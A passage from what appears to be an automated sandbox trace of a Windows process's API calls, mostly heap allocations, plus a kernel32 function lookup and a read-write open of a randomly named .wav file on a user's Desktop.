hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0161.598] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0161.599] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.600] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.600] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.601] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.602] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.602] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd7c8 [0161.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd7c8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.603] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7c8 [0161.603] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd7c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.603] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.603] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0161.603] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa85008 [0161.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", cchWideChar=63, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3f) returned 0x8db0a8 [0161.604] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", cchWideChar=63, lpMultiByteStr=0x8db0a8, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav", lpUsedDefaultChar=0x0) returned 63 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0161.604] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\gx8hb3o7amx5so9swzmc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.604] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.604] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0161.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa85008, cbMultiByte=63, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 63 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7e) returned 0x9c0c88 [0161.605] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa85008, cbMultiByte=63, lpWideCharStr=0x9c0c88, cchWideChar=63 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\gx8HB3O7amX5sO9SwzMc.wav") returned 63 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa85008 | out: hHeap=0x8a0000) returned 1 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.605] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.605] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0161.606] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.606] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 